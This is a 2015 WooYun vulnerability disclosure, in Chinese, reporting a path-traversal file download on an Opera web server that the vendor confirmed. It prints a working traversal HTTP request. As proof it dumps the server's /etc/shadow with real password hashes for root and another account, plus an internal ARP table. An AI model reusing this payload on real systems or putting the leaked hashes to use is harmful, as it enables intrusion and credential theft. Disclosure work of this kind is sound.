当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121436

漏洞标题:Opera某站点任意文件下载(内网root)

相关厂商:欧朋浏览器

漏洞作者: lijiejie

提交时间:2015-06-18 18:03

修复时间:2015-08-02 18:38

公开时间:2015-08-02 18:38

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-18: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向核心白帽子及相关领域专家公开
2015-07-08: 细节向普通白帽子公开
2015-07-18: 细节向实习白帽子公开
2015-08-02: 细节向公众公开

简要描述:

Opera某站点任意文件下载(内网root)

详细说明:

GET //../../../../../../../../proc/net/tcp  HTTP/1.1
Host: snow.opera.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*

漏洞证明:

下载/proc/net/tcp,得到本地IP为:790FC30A , 也即 10.195.15.121
root用户,可读shadow:

root:$6$0yM1yOOM$Ds.HVDLdEiIZUTh3ueegwYKXRZzWjjJMjyJX1V1IVnreMxU5ZlZ2ZmqOBQhvzM8fss0uh.ghsTbMSRVN6jc8T1:16330:0:99999:7:::
daemon:*:16330:0:99999:7:::
bin:*:16330:0:99999:7:::
sys:*:16330:0:99999:7:::
sync:*:16330:0:99999:7:::
games:*:16330:0:99999:7:::
man:*:16330:0:99999:7:::
lp:*:16330:0:99999:7:::
mail:*:16330:0:99999:7:::
news:*:16330:0:99999:7:::
uucp:*:16330:0:99999:7:::
proxy:*:16330:0:99999:7:::
www-data:*:16330:0:99999:7:::
backup:*:16330:0:99999:7:::
list:*:16330:0:99999:7:::
irc:*:16330:0:99999:7:::
gnats:*:16330:0:99999:7:::
nobody:*:16330:0:99999:7:::
libuuid:!:16330:0:99999:7:::
Debian-exim:!:16330:0:99999:7:::
statd:*:16330:0:99999:7:::
sshd:*:16330:0:99999:7:::
opera:$6$.8D0ABfy$3KNvEEwol.Mjnu0xLj5u//uhqZEePCM6cmKq2pIRZyb3SBMig2j6IjX5SyzmqolFOVP9INqyNWllI987.8D3m.:16330:0:99999:7:::
nagios:*:16330:0:99999:7:::
puppet:*:16331:0:99999:7:::
messagebus:*:16331:0:99999:7:::
munin:*:16331:0:99999:7:::
logcheck:*:16331:0:99999:7:::
mysql:!:16331:0:99999:7:::
tomcat6:*:16331:0:99999:7:::
usmanw:!:16331:0:99999:7:::
varnish:*:16331:0:99999:7:::
varnishlog:*:16331:0:99999:7:::
cosimo:!:16331:0:99999:7:::


/proc/net/arp 
IP address       HW type     Flags       HW address            Mask     Device
10.195.15.93     0x1         0x2         00:1f:a0:06:63:bc     *        eth0
10.195.15.78     0x1         0x2         52:54:00:a5:cb:5e     *        eth0
10.195.15.94     0x1         0x2         00:1f:a0:04:a3:fc     *        eth0
10.195.15.80     0x1         0x2         02:1f:a0:00:00:09     *        eth0
10.195.15.65     0x1         0x2         00:10:db:ff:50:00     *        eth0
10.195.15.81     0x1         0x2         02:1f:a0:00:00:09     *        eth0
10.195.15.66     0x1         0x2         00:9c:02:a5:2f:0a     *        eth0
10.195.15.67     0x1         0x2         00:9c:02:a5:30:22     *        eth0

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-18 18:37

厂商回复:

感谢报告,已经转给欧洲团队,他们正在处理。正在联系作者准备小礼品略表谢意。

最新状态:

暂无